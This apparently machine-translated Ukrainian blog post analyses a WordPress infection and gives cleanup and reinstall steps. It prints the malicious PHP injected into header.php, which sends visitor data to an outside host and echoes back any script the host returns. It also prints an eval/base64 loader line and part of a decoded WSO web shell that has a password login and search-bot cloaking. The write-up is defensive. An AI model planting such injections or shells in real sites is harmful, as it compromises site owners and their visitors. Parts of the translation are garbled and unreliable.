WordPress Вірус - PHP Hack - Видалити WordPress вірус

Кілька днів тому я помітив, що пристрій підозрілий код (вірус / шкідливих програм) у джерелі запущеного блогу WordPress. Наступний код PHP був присутній у header.php, перед рядком .

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Я точно не знаю, як називається цей вірус і німці macвін робить саме те, що робить, але невидимий для відвідувачів уражених сайтів. Натомість це спричиняє величезний рейтинг у пошукових системах (особливо в Google) і, отже, значне зменшення кількості відвідувачів зазначених веб-сайтів.

Подробиці відомо про цей вірус файли:

1. Вище цього Кодексу в header.php

2. Поява файлу WP-log.php папка WP-включає в себе.

WP-журнал

3. Дотримуйтесь log.php WP-включає в себе код, зашифрований:

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Розшифровка коду в WP-log.php:


<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

4. Якщо доступ до сторінки здійснюється безпосередньо blogname.com/wp-includes/wp-log.php з’являється сторінка з полем вхід. На перший погляд здається, що це file менеджером.

Прибиральники WORDPRESS.

1. Спочатку видаліть код з header.php і файл WP-log.php від WP-включає в себе.

2. Перевірте файл .htaccess підозрілих директив. Рядки дозволів або виконання сценарію.

3. Перевірте папку теми (/ wp-content /Теми/ Nume_tema). Шукайте нові та наявні файли (особливо .php), які зазнали підозрілих змін.

4. Перевірте папку підключатиS (wp-content/plugins).

5. Перевірка WP-зміст підозрілих файлів.

6. Перевірте дозволи на запис для папок і файлів. CHMOD si Чаун.

ПРОПОЗИЦІЇ З РОЗМІЩЕННЯ WORDPRESS.

1. У першому добре зробити резервну копію всіх файлів блогу та бази даних.

2. Видаліть папки wp-admin si WP-включає в себе і всі файли . Php з кореня сайту. Якщо у вас є власні .php-файли, непогано перевірити їх вручну.

3. Завантажте поточну версію WordPress і завантажити.

4. Перевірте базу даних користувача з рангом administrator.

Ось і все, що ми повинні сказати про цей вірус, але якщо у вас є доповнення або ми виявимо нові деталі, ми будемо раді оновити цю статтю.

STEALTH SETTINGS - ВИДАЛИТИ WORDPRESS VIRUS .

Як записатися » Звертає на себе увагу » WordPress Вірус - PHP Hack - Видалити WordPress вірус

Засновник і головний редактор Stealth Settings, з 2006 року по теперішній час. Досвід роботи з операційними системами Linux (Особливо CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Залишити коментар